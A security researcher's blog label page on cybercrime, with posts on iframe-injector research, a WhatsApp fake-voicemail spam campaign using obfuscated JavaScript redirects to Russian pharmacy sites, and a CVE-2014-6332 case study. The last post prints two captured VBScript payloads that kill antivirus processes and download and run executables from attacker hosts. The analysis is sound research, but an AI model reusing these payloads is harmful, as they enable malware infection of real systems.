Showing posts with label Cybercrime. Show all posts
Showing posts with label Cybercrime. Show all posts

Sunday, May 14, 2017

[Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit



In this paper, we present the design of distributed infection model used by attackers to inject malicious iframes on the fly to conduct large scale drive-by download attacks. We use the term “Iframe Injectors” which refers to the automated tools used by attackers to trigger mass infections. The Iframe Injectors can either be standalone tools or embedded components as a part of the botnets. We discuss the classification of Iframe Injectors and dissect a number of existing tools to understand their functionalities and how they are deployed effectively.

 Iframes are inline frames, which are HTML objects that are embedded in a web page to fetch content (HTML or JavaScript) from a third-party domain. The content is treated as a part of the primary web page and is served when that web page is accessed. This is a known HTML functionality and is heavily used for content sharing among multiple domains. However, attackers abuse this functionality in multiple variants of drive-by download attacks as a part of massive iframe infection campaigns. An attack starts with a malicious domain that hosts malware. The attackers then embed a URL referencing the malware in an iframe and place that in a compromised website (or any other self-managed website). Users are then coerced into visiting the web page that has the iframe embedded in it. When the user visits the page, the malware is fetched from the malicious domain and the end-user system is infected.


For complete details, the paper is available here: https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/

 PDF is available here: https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf
Posted by at
Labels: , , ,

Tuesday, September 29, 2015

[Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies!

Recently, we analyzed that spammers are doing "Whats App Fake Voicemail" spamming to trick end-users to visit online pharmacies' websites. There are high chances that malware can be downloaded on to the end-user systems visiting these spamming websites. However, during this analysis, we did not notice that behavior.

The trend of "Whats App Fake Voicemail" spamming messages is not new as we have been encountering these spamming activities for last few years. There are not significant changes in the methods of sending "Whats App Fake Voicemail" notification messages which are used to lure end-users to visit illegitimate domains. However  from security research perspective, the target is to understand how this spamming attack is carried at the backend.  Since the "Whats App" organization brand is treated as a bait, as a result of which, there are high chances that people will click the links in the notification emails. This spamming attack is targeted against broad set of users on the Internet in order to redirect them to the online pharmacies' outlets managed by Russian cyber actors. Check more on online pharmacies monetary model here : https://en.wikipedia.org/wiki/Online_pharmacy

Let's perform the analysis. The end-user receives the email notification for "Whats App Fake Voicemail" message as follows:



When end-user clicks the domain it is redirected to the malicious domain that serves following HTTP response headers as shown below. The landing web pages are hosted on Wordpress portal which looks like to be a compromised website. Let's take a close look on the HTTP response headers.

GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1
Host pasarjagakarsa.com
User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Connection keep-alive

 (Status-Line) HTTP/1.1 404 Not Found
Server nginx
Date Tue, 29 Sep 2015 19:32:40 GMT
Content-Type text/html
Transfer-Encoding chunked
Connection keep-alive
Vary Accept-Encoding
X-Powered-By PHP/5.4.44
Content-Encoding gzip

If you see the highlighted part in the HTTP response headers, it shows "404 Not Found" error which generally means resource does not exist on the web server. Infact it is not true, the web server responded back with following content as a part of web page.



Before going further, check our earlier articles on JavaScript de-obfuscation

If you notice, the web page has an obfuscated JavaScript embedded in it. Let's extract the obfuscated JavaScript as shown below:



The obfuscated JS is not that complex and it can be de-obfuscated easily. On de-obfuscation it was observed that the user's browser was further redirected to the following domain: "hxxp://magicorganicmarket.ru" as shown below:



Due to misconfiguration on the landing domain:"hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php" , the directory listing was obtained as follows:



Several other malicious links with obfuscated JavaScripts were obtained and presented as follows:
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php

function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);

Online Pharmacy Website after De-obfuscating JS Codehxxp://naturalherbsoutlet.ru/


hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php

function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://genericaidcompany.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php

function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);
Online Pharmacy Website after De-obfuscating JS Code: hxxp://medicalsafeservices.ru/

hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php

function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);
Online Pharmacy Website after De-obfuscating JS Codehxxp://perfectherbswebmart.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php

function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);
 Online Pharmacy Website after De-obfuscating JS Codehxxp://onlineremedyvalue.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);
 Online Pharmacy Website after De-obfuscating JS Codehxxp://naturalpillmall.ru/
hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php
function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);
 Online Pharmacy Website after De-obfuscating JS Codehxxp://herbalhotpurchase.ru/

[Updates]

All the information and orders are actually handled by this primary outlet - hxxps://checkoutucxefvfq.fastcheckoutrx.com/



We performed tests at the network level to understand on how the name servers were configured and we found that DNS fluxing was used in this campaign. The Time-To-Live (TTL) field is set for 600 seconds and after the IP address of the domain changes. 

Here is an example:

perfectherbswebmart.ru. 600 IN A 82.199.121.167
perfectherbswebmart.ru. 600 IN A 198.144.158.52

Some analytical points for consideration:
  • Overall extensive ".ru" domains have been used in this spamming campaign.
  • One can conclude that automated spam-code generation tools have been used in this campaign to ease out the process of large scale infection
    • For example:- infecting PHP pages with JavaScript obfuscated code hosted on the compromised websites
  • The campaign looks like to be executed at an extensive level considering the artefacts.
    • Many similar instances of JavaScript obfuscation have been analyzed as presented above
    • A number of online pharmacy websites found after de-obfuscating the JavaScript:
      • hxxp://herbalhotpurchase.ru/
      • hxxp://naturalpillmall.ru/
      • hxxp://onlineremedyvalue.ru/
      • hxxp://perfectherbswebmart.ru/
      • hxxp://medicalsafeservices.ru/
      • hxxp://genericaidcompany.ru/
      • hxxp://naturalherbsoutlet.ru/
  • We believe that this is just the tip of the iceberg and there will be many more
We won't be surprised if the same tactics are used for drive-by download instead of spamming in particular.

Note: At the time of drafting this post, all the websites were active.

Stay Secure !
Posted by at
Labels: , ,

Saturday, March 14, 2015

A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !

Recently, we have observed in our analysis that the exploit code for vulnerability with identifier CVE-2014-6332 is either directly embedded in the webpages of the infected website or used as a part of  Browser Exploits Packs (BEPs) for downloading malware and executing commands remotely.

Earlier, we have discussed about how Chinese domains served almost the similar exploits taken from MetaSploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, the attackers tweak the structure of exploits as per the requirements in order to conduct successful infections on the fly through compromised websites.

Let's discuss the vulnerability in question. From Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."

Refer: Metasploit Module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx)

Trend Micro has some discussed about this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/) so we do now want to discuss that in detail.

Two variants of VBScript have been found that are used in conjunction with this vulnerability which are discussed below. The primary structure of the exploit remains the same but payload is solely based on the VBScript code embedded in the webpages or BEPs.

As you can see, "cmd.exe" is triggered with options "/q, /c" which forces the Windows to execute command without echoing the output which means commands are executed without any notifications in the Windows GUI. Other insights:

The Norton "360.exe" process is killed and several other commands are executed.

 <script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("wscript.shell")  
 shell.run "cmd.exe /q /c net user admin /del",0  
 shell.run "cmd.exe /q /c sc stop sharedaccess",0  
 shell.run "cmd.exe /q /c md C:\RECYCLER",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0  
 shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\360.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\361.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0  
 shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0  
 shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0  
 end function  
 </script>

Another variant of exploit payload is shown below which highlights that how exactly HTTP requests are issued using AJAX and MSXML2 for downloading malware (http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active) directly. VBScript calls are then used to execute the  malware.

 

<script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("Shell.Application")  
 shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo 
Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo 
objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0  
 end function  
 </script>

Public available exploits can be tweaked easily as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting vulnerabilities in the browsers.

Inference: Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.

Posted by at
Labels: , , ,

Sunday, February 8, 2015

Virus Bulletin Paper - Prosecting the Citadel botnet !

Virus Bulletin published earlier our research on Citadel. Check the links:

 Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf
Posted by at
Labels: , , ,

Tuesday, April 15, 2014

Targeted Cyber Attacks Book - Syngress !

Update: A very insightful review of the book published in Network Security.




I started sketching this book about a year ago when I was invited by Syngress for this project based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments,  the project got delayed but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to the readers who are interested in understanding the artifacts of targeted cyber-attacks and associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.

 Introduction: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses that usually attack indiscriminately, targeted attacks involve intelligence-gathering and planning to a degree that drastically changes its profile.
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into what techniques and resources are used to stage these attacks so that you can counter them more effectively.

The book is available to be ordered at following places:
Note: Elsevier Store will offer electronic versions that are readable on Kindles in PDF and MOBI format.

Enjoy !
Posted by at
Labels: , , , ,

Wednesday, February 13, 2013

IEEE Security and Privacy Magazine - Targeted Cyber Attacks Paper


Our paper on targeted attacks is out in IEEE Security and Privacy Magazine.

"Targeted cyber attacks play an increasingly significant role in disrupting the online social and economic model, not to mention the threat they pose to nation-states. A variety of components and techniques come together to bring about such attacks"

Refer here: http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html

Enjoy !
Posted by at
Labels: , , , ,

Wednesday, February 6, 2013

Elsevier IJCIP - Crimeware-as-a-service – A survey of commoditized crimeware in the underground market

Our paper on Crimeware-as-a-Service (CaaS) has been accepted for publication in Elsevier's Journal of Critical Infrastructure Protection and is available at http://www.sciencedirect.com/science/article/pii/S1874548213000036.

 Abstract: Crimeware-as-a-Service (CaaS) has become a prominent component of the underground economy. CaaS provides a new dimension to cyber crime by making it more organized, automated, and accessible to criminals with limited technical skills. This paper dissects CaaS and explains the essence of the underground economy that has grown around it. The paper also describes the various crimeware services that are provided in the underground market.
Posted by at
Labels: , , , ,

Wednesday, January 30, 2013

IEEE Internet Computing - Dissecting the State of Underground Enterprise

Our paper on "Dissecting the State of Underground Enterprise" is finally out in IEEE Internet Computing.

Abstract: "Cybercrime's tentacles reach deeply into the Internet. A complete, underground criminal economy has developed that lets malicious actors steal money through the Web. The authors detail this enterprise, showing how information, expertise, and money flow through it. Understanding the underground economy's structure is critical for fighting it."

Its available here: http://www.computer.org/csdl/mags/ic/2013/01/mic2013010060-abs.html.

Posted by at
Labels: , ,
Subscribe to: Posts (Atom)